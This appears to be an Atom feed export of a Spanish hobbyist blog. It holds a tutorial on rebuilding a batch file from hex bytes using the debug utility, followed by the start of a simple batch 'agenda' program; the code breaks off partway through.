<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-1525638350117099508</id><updated>2011-10-15T16:42:46.800-07:00</updated><category term='VBScript'/><category term='Scanners'/><category term='Microsoft'/><category term='PathFinder'/><category term='Youtube'/><category term='SQL Injection'/><category term='C'/><category term='Crackme'/><category term='Windows'/><category term='Asteriscos'/><category term='NetBios'/><category term='Addons'/><category term='HTTP'/><category term='antena3.com'/><category term='Flash'/><category term='Tutoriales'/><category term='Noticias'/><category term='FTP'/><category term='Visual Basic'/><category term='Shells'/><category term='Batch'/><category term='Batch Game'/><category term='Humor'/><category term='Paint'/><category term='Troyanos'/><category term='Bruteforce'/><category term='RFI'/><category term='Admin Page Finder'/><category term='crtvg.es'/><category term='ASCII'/><category term='Hackers'/><category term='Gmail'/><category term='efecto'/><category term='Batch Injection'/><category term='Perl'/><category term='Funcion Lenght'/><category term='Google'/><category term='Set'/><category term='XSendMails'/><category term='SMF'/><category term='PHP'/><category term='Firefox'/><category term='Bugs'/><category term='TrueCrypt'/><category term='Exploits'/><category term='Blind SQL Injection'/><category term='Hacking'/><category term='Converter'/><category term='TextToAscii'/><category term='XSS'/><category term='Defacing'/><title type='text'>~xassiz_'s blog</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://xassiz.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1525638350117099508/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://xassiz.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>xassiz</name><uri>http://www.blogger.com/profile/15634923301921834243</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>66</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-1525638350117099508.post-6174228361952201553</id><published>2010-03-12T14:13:00.000-08:00</published><updated>2010-03-12T14:22:55.997-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Batch'/><category scheme='http://www.blogger.com/atom/ns#' term='Tutoriales'/><title type='text'>[Tutorial] Tecnica para reconstruir archivos en Batch - by xassiz</title><content type='html'>&lt;div class="post" id="msg_26964"&gt;&lt;div align="center"&gt;&lt;span style="color:red;"&gt;&lt;b&gt;&lt;span style="line-height: 1.3em;font-size:130%;" &gt;Tecnica para reconstruir archivos en Batch&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Creditos a el usuario &lt;b&gt;0x0309&lt;/b&gt; que gracias a el aprendi esto &lt;img src="http://foro.code-makers.net/Smileys/SoLoSMiLeYS1/wink.gif" alt="Giñar" border="0" /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Primero, para hacer esto de esta forma necesitamos &lt;b&gt;debug&lt;/b&gt;.&lt;br /&gt;&lt;br /&gt;Entonces saber que no funcionará en Windows de 64 bits ni en Windows seven, ya que &lt;b&gt;debug&lt;/b&gt; es un programa para 16 bits. &lt;img src="http://foro.code-makers.net/Smileys/SoLoSMiLeYS1/tongue.gif" alt="Lengua" border="0" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Bien, el primer ejemplo que voy a poner es reconstruir un archivo bat, al que le llamaremos &lt;b&gt;hola.bat&lt;/b&gt; y su código será:&lt;br /&gt;&lt;div class="codeheader"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="code"&gt;&lt;pre style="margin-top: 0pt; display: inline;"&gt;&lt;blockquote&gt;@echo off&lt;br /&gt;echo hola&lt;br /&gt;pause&lt;br /&gt;exit&lt;/blockquote&gt;&lt;br /&gt;&lt;/pre&gt;&lt;/div&gt;&lt;br /&gt;Es decir un "Hola Mundo".&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Una vez creado &lt;b&gt;hola.bat&lt;/b&gt; abrimos el cmd y ponemos "&lt;b&gt;debug hola.bat&lt;/b&gt;":&lt;br /&gt;&lt;div class="codeheader"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="code"&gt;&lt;pre style="margin-top: 0pt; display: inline;"&gt;&lt;blockquote&gt;C:\Users\xassiz\Desktop&gt; debug hola.bat&lt;br /&gt;-&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;/pre&gt;&lt;/div&gt;&lt;br /&gt;Nos va a aparecer un guión. Ahí escribiremos "&lt;b&gt;d&lt;/b&gt;", y nos aparecerá algo así:&lt;br /&gt;&lt;div class="codeheader"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="code"&gt;&lt;pre style="margin-top: 0pt; display: inline;"&gt;&lt;blockquote&gt;C:\Users\xassiz\Desktop&gt; debug hola.bat&lt;br /&gt;-d&lt;br /&gt;&lt;br /&gt;17B6:0100  40 65 63 68 6F 20 6F 66-66 0D 0A 65 63 68 6F 20   @echo off..echo&lt;br /&gt;17B6:0110  68 6F 6C 61 0D 0A 70 61-75 73 65 0D 0A 65 78 69   hola..pause..exi&lt;br /&gt;17B6:0120  74 0D 0A 00 00 00 00 00-00 00 00 00 00 00 00 00   t...............&lt;br /&gt;17B6:0130  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00   ................&lt;br /&gt;17B6:0140  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00   ................&lt;br /&gt;17B6:0150  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00   ................&lt;br /&gt;17B6:0160  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00   ................&lt;br /&gt;17B6:0170  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00   ................&lt;br /&gt;-&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;/pre&gt;&lt;/div&gt;&lt;br /&gt;Ahí nos sale otro guión, en este escribimos una "&lt;b&gt;q&lt;/b&gt;" para salir.&lt;br /&gt;&lt;br /&gt;Son intrucciones y datos en hexadecimal.&lt;br /&gt;&lt;br /&gt;Bien, ahora si nos fijamos en el peso de "&lt;b&gt;hola.bat&lt;/b&gt;" vemos que ocupa 35 bytes.&lt;br /&gt;&lt;br /&gt;Pues cogemos los primeros 35 bytes en hexadecimal y los copiamos (de &lt;b&gt;40&lt;/b&gt; a &lt;b&gt;0A&lt;/b&gt;).&lt;br /&gt;&lt;br /&gt;Luego abrimos el &lt;b&gt;notepad&lt;/b&gt; y escribimos:&lt;br /&gt;&lt;br /&gt;&lt;div class="codeheader"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="code"&gt;&lt;pre style="margin-top: 0pt; display: inline;"&gt;&lt;blockquote&gt;e 0100  40 65 63 68 6F 20 6F 66 66 0D 0A 65 63 68 6F 20&lt;br /&gt;e 0110  68 6F 6C 61 0D 0A 70 61 75 73 65 0D 0A 65 78 69&lt;br /&gt;e 0120  74 0D 0A&lt;/blockquote&gt;&lt;br /&gt;&lt;/pre&gt;&lt;/div&gt;&lt;br /&gt;Así colocamos los bytes en hexa. Las &lt;b&gt;e&lt;/b&gt; indican &lt;b&gt;ENTER&lt;/b&gt; para introducir informacion.&lt;br /&gt;&lt;br /&gt;Seguimos escribiendo:&lt;br /&gt;&lt;div class="codeheader"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="code"&gt;&lt;pre style="margin-top: 0pt; display: inline;"&gt;&lt;blockquote&gt;r cx&lt;br /&gt;23&lt;br /&gt;n nuevo.bat&lt;br /&gt;w&lt;br /&gt;q&lt;br /&gt;:xassiz&lt;/blockquote&gt;&lt;br /&gt;&lt;/pre&gt;&lt;/div&gt;&lt;br /&gt;En total nos quedaría así:&lt;br /&gt;&lt;div class="codeheader"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="code"&gt;&lt;pre style="margin-top: 0pt; display: inline;"&gt;&lt;blockquote&gt;e 0100  40 65 63 68 6F 20 6F 66 66 0D 0A 65 63 68 6F 20&lt;br /&gt;e 0110  68 6F 6C 61 0D 0A 70 61 75 73 65 0D 0A 65 78 69&lt;br /&gt;e 0120  74 0D 0A&lt;br /&gt;r cx&lt;br /&gt;23&lt;br /&gt;n nuevo.bat&lt;br /&gt;w&lt;br /&gt;q&lt;br /&gt;:xassiz&lt;/blockquote&gt;&lt;br /&gt;&lt;/pre&gt;&lt;/div&gt;&lt;br /&gt;Bien, la &lt;b&gt;r cx&lt;/b&gt; indica que escribimos en el registro CX (si sabeis ASM es muy facil).&lt;br /&gt;&lt;br /&gt;el &lt;b&gt;23&lt;/b&gt; que puse es el peso (35 bytes) en hexadecimal.&lt;br /&gt;&lt;br /&gt;el &lt;b&gt;n&lt;/b&gt; es el nombre con la extension (8.3)&lt;br /&gt;&lt;br /&gt;el &lt;b&gt;w&lt;/b&gt; viene de &lt;b&gt;WRITE&lt;/b&gt;, de escribir.&lt;br /&gt;&lt;br /&gt;el &lt;b&gt;q&lt;/b&gt; como ya dije antes es para salir.&lt;br /&gt;&lt;br /&gt;la etiqueta &lt;b&gt;:xassiz&lt;/b&gt; es para dejar algo escrito luego de &lt;b&gt;q&lt;/b&gt; (salir) y asegurar de que salió (se le puede poner cualquier nombre).&lt;br /&gt;&lt;br /&gt;Bueno, esto lo guardamos como &lt;b&gt;codigo.src&lt;/b&gt; por ejemplo.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Entonces vamos al cmd y ponemos "&lt;b&gt;debug&amp;lt;codigo.src&lt;/b&gt;":&lt;br /&gt;&lt;div class="codeheader"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="code"&gt;&lt;pre style="margin-top: 0pt; display: inline;"&gt;&lt;blockquote&gt;C:\Users\xassiz\Desktop&gt; debug&amp;lt;codigo.src&lt;br /&gt;&lt;br /&gt;-e 0100  40 65 63 68 6F 20 6F 66 66 0D 0A 65 63 68 6F 20&lt;br /&gt;-e 0110  68 6F 6C 61 0D 0A 70 61 75 73 65 0D 0A 65 78 69&lt;br /&gt;-e 0120  74 0D 0A&lt;br /&gt;-r cx&lt;br /&gt;CX 0000&lt;br /&gt;:23&lt;br /&gt;-n nuevo.bat&lt;br /&gt;-w&lt;br /&gt;Writing 00023 bytes&lt;br /&gt;-q&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;/pre&gt;&lt;/div&gt;&lt;br /&gt;Si nos fijamos, vemos que se creó el archivo "&lt;b&gt;NUEVO.bat&lt;/b&gt;", que al ejecutarlo vemos que tiene el mismo código que &lt;b&gt;hola.bat&lt;/b&gt;, es decir, reconstruímos "hola.bat" con &lt;b&gt;debug&lt;/b&gt;.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Bien, ahora mostraré algunos tips para hacer el proceso pronto y enteramente desde un .bat&lt;br /&gt;&lt;br /&gt;Que conste que esta técnica a partir de ahora no se la vi a nadie, la desarollé yo (lo cual no quiere decir que lo hiciera otra persona antes).&lt;br /&gt;&lt;br /&gt;Bueno, comencemos.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Una vez conseguimos el código:&lt;br /&gt;&lt;div class="codeheader"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="code"&gt;&lt;pre style="margin-top: 0pt; display: inline;"&gt;&lt;blockquote&gt;e 0100  40 65 63 68 6F 20 6F 66 66 0D 0A 65 63 68 6F 20&lt;br /&gt;e 0110  68 6F 6C 61 0D 0A 70 61 75 73 65 0D 0A 65 78 69&lt;br /&gt;e 0120  74 0D 0A&lt;br /&gt;r cx&lt;br /&gt;23&lt;br /&gt;n nuevo.bat&lt;br /&gt;w&lt;br /&gt;q&lt;br /&gt;:xassiz&lt;/blockquote&gt;&lt;br /&gt;&lt;/pre&gt;&lt;/div&gt;&lt;br /&gt;Podemos crear nuevo.bat sin necesidad de crear ningún otro archivo aparte como &lt;b&gt;codigo.src&lt;/b&gt;.&lt;br /&gt;&lt;br /&gt;Pero primero mostraré como copiar todo el codigo con facilidad.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Vamos a la cmd y ponemos "&lt;b&gt;echo d|debug hola.bat&gt;codigo.txt&lt;/b&gt;". Y vemos que se nos genera el archivo "codigo.bat" con la salida del cmd dentro.&lt;br /&gt;&lt;br /&gt;¿Como funciona? Pues usando pipes ("|") envío una "d" a la salida de debug (para cuando nos pide que pongamos algo con el guion) y envio la salida a &lt;b&gt;codigo.txt&lt;/b&gt;.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Bueno, una vez con el código preparado, podemos hacer algo.&lt;br /&gt;&lt;br /&gt;En vez de crear un archivo y hacerle un &lt;b&gt;debug&amp;lt;archivo&lt;/b&gt; podemos imprimir el contenido en el cmd y mediante pipes hacerle un debug sin necesidar de crear mas nada!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Veamos el ejemplo:&lt;br /&gt;&lt;div class="codeheader"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="code"&gt;&lt;pre style="margin-top: 0pt; display: inline;"&gt;&lt;blockquote&gt;(&lt;br /&gt;echo:e 0100 40 65 63 68 6F 20 6F 66 66 0D 0A 65 63 68 6F 20&lt;br /&gt;echo:e 0110 68 6F 6C 61 0D 0A 70 61 75 73 65 0D 0A 65 78 69&lt;br /&gt;echo:e 0120 74 0D 0A&lt;br /&gt;echo:r cx&lt;br /&gt;echo:23&lt;br /&gt;echo:n nuevo.bat&lt;br /&gt;echo:w&lt;br /&gt;echo:q&lt;br /&gt;echo::xassiz&lt;br /&gt;)|debug&lt;/blockquote&gt;&lt;br /&gt;&lt;/pre&gt;&lt;/div&gt;&lt;br /&gt;Y se nos reconstruye directamente &lt;b&gt;nuevo.bat&lt;/b&gt;.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Bueno, espero que os haya gustado, la pega de esto es que el limite es de &lt;b&gt;65280 bytes&lt;/b&gt;.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Saludos,&lt;br /&gt;xassiz &lt;img src="http://foro.code-makers.net/Smileys/SoLoSMiLeYS1/wink.gif" alt="Giñar" border="0" /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1525638350117099508-6174228361952201553?l=xassiz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xassiz.blogspot.com/feeds/6174228361952201553/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://xassiz.blogspot.com/2010/03/tutorial-tecnica-para-reconstruir.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1525638350117099508/posts/default/6174228361952201553'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1525638350117099508/posts/default/6174228361952201553'/><link rel='alternate' type='text/html' href='http://xassiz.blogspot.com/2010/03/tutorial-tecnica-para-reconstruir.html' title='[Tutorial] Tecnica para reconstruir archivos en Batch - by xassiz'/><author><name>xassiz</name><uri>http://www.blogger.com/profile/15634923301921834243</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1525638350117099508.post-242621759046408406</id><published>2010-03-12T14:08:00.001-08:00</published><updated>2010-03-12T14:12:33.980-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Batch'/><title type='text'>[Batch] Agenda - by xassiz</title><content type='html'>&lt;span style="font-family: verdana;"&gt;Bueno!&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;Pues hace mucho que no posteaba nada, espero volver a hacerlo más a menudo xD&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;Os presento mi "agenda" en Batch, la acabo de programar para tener apuntados los examenes que voy a tener xDD&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;A diferencia de otras agendas que vi, la mía tiene menos líneas de código y "creé un sistema" que permite almacenar la información añadida sin crear archivos adicionales.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;Espero que os guste, aquí teneis el código:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;pre class="geshi"&gt;&lt;span style="color: rgb(51, 204, 51);"&gt;&lt;/span&gt;&lt;blockquote&gt;&lt;span style="color: rgb(51, 204, 51);"&gt;@&lt;/span&gt;&lt;a href="http://www.ss64.com/nt/echo.html"&gt;&lt;span style="color: rgb(177, 177, 0); font-weight: bold;"&gt;echo&lt;/span&gt;&lt;/a&gt; off&lt;br /&gt;title Agenda - by xassiz&lt;br /&gt;&lt;a href="http://www.ss64.com/nt/setlocal.html"&gt;&lt;span style="color: rgb(177, 177, 0); font-weight: bold;"&gt;setlocal&lt;/span&gt;&lt;/a&gt; enabledelayedexpansion&lt;br /&gt;&lt;br /&gt;:&lt;span style="color: rgb(177, 0, 177); font-weight: bold;"&gt;menu&lt;/span&gt;&lt;br /&gt;cls&lt;br /&gt;&lt;a href="http://www.ss64.com/nt/echo.html"&gt;&lt;span style="color: rgb(177, 177, 0); font-weight: bold;"&gt;echo&lt;/span&gt;&lt;/a&gt;:&lt;br /&gt;&lt;a href="http://www.ss64.com/nt/echo.html"&gt;&lt;span style="color: rgb(177, 177, 0); font-weight: bold;"&gt;echo&lt;/span&gt;&lt;/a&gt;:    ^| MENU ^|&lt;br /&gt;&lt;a href="http://www.ss64.com/nt/echo.html"&gt;&lt;span style="color: rgb(177, 177, 0); font-weight: bold;"&gt;echo&lt;/span&gt;&lt;/a&gt;:&lt;br /&gt;&lt;a href="http://www.ss64.com/nt/echo.html"&gt;&lt;span style="color: rgb(177, 177, 0); font-weight: bold;"&gt;echo&lt;/span&gt;&lt;/a&gt;: &lt;span style="color: rgb(204, 102, 204);"&gt;1&lt;/span&gt;. Ver Agenda&lt;br /&gt;&lt;a href="http://www.ss64.com/nt/echo.html"&gt;&lt;span style="color: rgb(177, 177, 0); font-weight: bold;"&gt;echo&lt;/span&gt;&lt;/a&gt;: &lt;span style="color: rgb(204, 102, 204);"&gt;2&lt;/span&gt;. Agregar Tarea&lt;br /&gt;&lt;a href="http://www.ss64.com/nt/echo.html"&gt;&lt;span style="color: rgb(177, 177, 0); font-weight: bold;"&gt;echo&lt;/span&gt;&lt;/a&gt;: &lt;span style="color: rgb(204, 102, 204);"&gt;3&lt;/span&gt;. Salir&lt;br /&gt;&lt;a href="http://www.ss64.com/nt/echo.html"&gt;&lt;span style="color: rgb(177, 177, 0); font-weight: bold;"&gt;echo&lt;/span&gt;&lt;/a&gt;:&lt;br /&gt;&lt;a href="http://www.ss64.com/nt/set.html"&gt;&lt;span style="color: rgb(177, 177, 0); font-weight: bold;"&gt;set&lt;/span&gt;&lt;/a&gt; &lt;span style="color: rgb(68, 136, 68);"&gt;"op&lt;/span&gt;="&lt;br /&gt;&lt;a href="http://www.ss64.com/nt/set.html"&gt;&lt;span style="color: rgb(177, 177, 0); font-weight: bold;"&gt;set&lt;/span&gt;&lt;/a&gt;/p "op=&gt;&gt; "&lt;br /&gt;&lt;a href="http://www.ss64.com/nt/if.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;if&lt;/span&gt;&lt;/a&gt; &lt;a href="http://www.ss64.com/nt/not.html"&gt;&lt;span style="color: rgb(0, 0, 0); font-weight: bold;"&gt;not&lt;/span&gt;&lt;/a&gt; &lt;a href="http://www.ss64.com/nt/defined.html"&gt;&lt;span style="color: rgb(0, 0, 0); font-weight: bold;"&gt;defined&lt;/span&gt;&lt;/a&gt; op &lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;&lt;a href="http://www.ss64.com/nt/goto.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;goto&lt;/span&gt;&lt;/a&gt;:menu&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;&lt;br /&gt;&lt;a href="http://www.ss64.com/nt/if.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;if&lt;/span&gt;&lt;/a&gt; &lt;span style="color: rgb(102, 204, 102);"&gt;[&lt;/span&gt;"&lt;span style="color: rgb(51, 204, 51);"&gt;%&lt;/span&gt;&lt;span style="color: rgb(68, 136, 136);"&gt;op&lt;/span&gt;&lt;span style="color: rgb(51, 204, 51);"&gt;%&lt;/span&gt;"&lt;span style="color: rgb(102, 204, 102);"&gt;]&lt;/span&gt;==&lt;span style="color: rgb(102, 204, 102);"&gt;[&lt;/span&gt;"&lt;span style="color: rgb(204, 102, 204);"&gt;1&lt;/span&gt;"&lt;span style="color: rgb(102, 204, 102);"&gt;]&lt;/span&gt; &lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;&lt;a href="http://www.ss64.com/nt/goto.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;goto&lt;/span&gt;&lt;/a&gt;:Show&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;&lt;br /&gt;&lt;a href="http://www.ss64.com/nt/if.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;if&lt;/span&gt;&lt;/a&gt; &lt;span style="color: rgb(102, 204, 102);"&gt;[&lt;/span&gt;"&lt;span style="color: rgb(51, 204, 51);"&gt;%&lt;/span&gt;&lt;span style="color: rgb(68, 136, 136);"&gt;op&lt;/span&gt;&lt;span style="color: rgb(51, 204, 51);"&gt;%&lt;/span&gt;"&lt;span style="color: rgb(102, 204, 102);"&gt;]&lt;/span&gt;==&lt;span style="color: rgb(102, 204, 102);"&gt;[&lt;/span&gt;"&lt;span style="color: rgb(204, 102, 204);"&gt;2&lt;/span&gt;"&lt;span style="color: rgb(102, 204, 102);"&gt;]&lt;/span&gt; &lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;&lt;a href="http://www.ss64.com/nt/goto.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;goto&lt;/span&gt;&lt;/a&gt;:Add&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;&lt;br /&gt;&lt;a href="http://www.ss64.com/nt/if.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;if&lt;/span&gt;&lt;/a&gt; &lt;span style="color: rgb(102, 204, 102);"&gt;[&lt;/span&gt;"&lt;span style="color: rgb(51, 204, 51);"&gt;%&lt;/span&gt;&lt;span style="color: rgb(68, 136, 136);"&gt;op&lt;/span&gt;&lt;span style="color: rgb(51, 204, 51);"&gt;%&lt;/span&gt;"&lt;span style="color: rgb(102, 204, 102);"&gt;]&lt;/span&gt;==&lt;span style="color: rgb(102, 204, 102);"&gt;[&lt;/span&gt;"&lt;span style="color: rgb(204, 102, 204);"&gt;3&lt;/span&gt;"&lt;span style="color: rgb(102, 204, 102);"&gt;]&lt;/span&gt; &lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;&lt;a href="http://www.ss64.com/nt/exit.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;exit&lt;/span&gt;&lt;/a&gt;&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;&lt;br /&gt;&lt;a href="http://www.ss64.com/nt/goto.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;goto&lt;/span&gt;&lt;/a&gt;:menu&lt;br /&gt;&lt;br /&gt;:&lt;span style="color: rgb(177, 0, 177); font-weight: bold;"&gt;Show&lt;/span&gt;&lt;br /&gt;cls&lt;br /&gt;&lt;a href="http://www.ss64.com/nt/for.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;for&lt;/span&gt;&lt;/a&gt; /f "tokens=*" &lt;span style="color: rgb(51, 204, 51);"&gt;%&lt;/span&gt;&lt;span style="color: rgb(51, 204, 51);"&gt;%&lt;/span&gt;x &lt;a href="http://www.ss64.com/nt/in.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;in&lt;/span&gt;&lt;/a&gt; &lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;&lt;span style="color: rgb(51, 204, 51);"&gt;%&lt;/span&gt;&lt;span style="color: rgb(68, 136, 136);"&gt;~&lt;span style="color: rgb(204, 102, 204);"&gt;0&lt;/span&gt;&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt; &lt;a href="http://www.ss64.com/nt/do.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;do&lt;/span&gt;&lt;/a&gt; &lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;&lt;br /&gt;&lt;a href="http://www.ss64.com/nt/set.html"&gt;&lt;span style="color: rgb(177, 177, 0); font-weight: bold;"&gt;set&lt;/span&gt;&lt;/a&gt; &lt;span style="color: rgb(68, 136, 68);"&gt;"line&lt;/span&gt;=&lt;/span&gt;&lt;span style="color: rgb(51, 204, 51);"&gt;%%&lt;/span&gt;&lt;span style="color: rgb(68, 136, 136);"&gt;x"&lt;br /&gt;&lt;a href="http://www.ss64.com/nt/if.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;if&lt;/span&gt;&lt;/a&gt; &lt;span style="color: rgb(102, 204, 102);"&gt;[&lt;/span&gt;"!line:~&lt;span style="color: rgb(204, 102, 204);"&gt;0&lt;/span&gt;,&lt;span style="color: rgb(204, 102, 204);"&gt;10&lt;/span&gt;!"&lt;span style="color: rgb(102, 204, 102);"&gt;]&lt;/span&gt;==&lt;span style="color: rgb(102, 204, 102);"&gt;[&lt;/span&gt;"::AGENDA::"&lt;span style="color: rgb(102, 204, 102);"&gt;]&lt;/span&gt; &lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;&lt;br /&gt;&lt;a href="http://www.ss64.com/nt/set.html"&gt;&lt;span style="color: rgb(177, 177, 0); font-weight: bold;"&gt;set&lt;/span&gt;&lt;/a&gt; &lt;span style="color: rgb(68, 136, 68);"&gt;"line&lt;/span&gt;=!line:~&lt;span style="color: rgb(204, 102, 204);"&gt;10&lt;/span&gt;!"&lt;br /&gt;&lt;a href="http://www.ss64.com/nt/echo.html"&gt;&lt;span style="color: rgb(177, 177, 0); font-weight: bold;"&gt;echo&lt;/span&gt;&lt;/a&gt;:&lt;br /&gt;&lt;a href="http://www.ss64.com/nt/echo.html"&gt;&lt;span style="color: rgb(177, 177, 0); font-weight: bold;"&gt;echo&lt;/span&gt;&lt;/a&gt;:!line!&lt;br /&gt;&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;&lt;br /&gt;&lt;a href="http://www.ss64.com/nt/echo.html"&gt;&lt;span style="color: rgb(177, 177, 0); font-weight: bold;"&gt;echo&lt;/span&gt;&lt;/a&gt;:&lt;br /&gt;&lt;a href="http://www.ss64.com/nt/pause.html"&gt;&lt;span style="color: rgb(177, 177, 0); font-weight: bold;"&gt;pause&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.ss64.com/nt/goto.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;goto&lt;/span&gt;&lt;/a&gt;:menu&lt;br /&gt;&lt;br /&gt;:&lt;span style="color: rgb(177, 0, 177); font-weight: bold;"&gt;Add&lt;/span&gt;&lt;br /&gt;cls&lt;br /&gt;&lt;a href="http://www.ss64.com/nt/set.html"&gt;&lt;span style="color: rgb(177, 177, 0); font-weight: bold;"&gt;set&lt;/span&gt;&lt;/a&gt; &lt;span style="color: rgb(68, 136, 68);"&gt;"fecha&lt;/span&gt;="&lt;br /&gt;&lt;a href="http://www.ss64.com/nt/set.html"&gt;&lt;span style="color: rgb(177, 177, 0); font-weight: bold;"&gt;set&lt;/span&gt;&lt;/a&gt;/p "fecha=- Fecha &lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;dd/mm/aaaa&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;: "&lt;br /&gt;&lt;a href="http://www.ss64.com/nt/if.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;if&lt;/span&gt;&lt;/a&gt; &lt;a href="http://www.ss64.com/nt/not.html"&gt;&lt;span style="color: rgb(0, 0, 0); font-weight: bold;"&gt;not&lt;/span&gt;&lt;/a&gt; &lt;a href="http://www.ss64.com/nt/defined.html"&gt;&lt;span style="color: rgb(0, 0, 0); font-weight: bold;"&gt;defined&lt;/span&gt;&lt;/a&gt; fecha &lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;&lt;a href="http://www.ss64.com/nt/goto.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;goto&lt;/span&gt;&lt;/a&gt;:Add&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;&lt;br 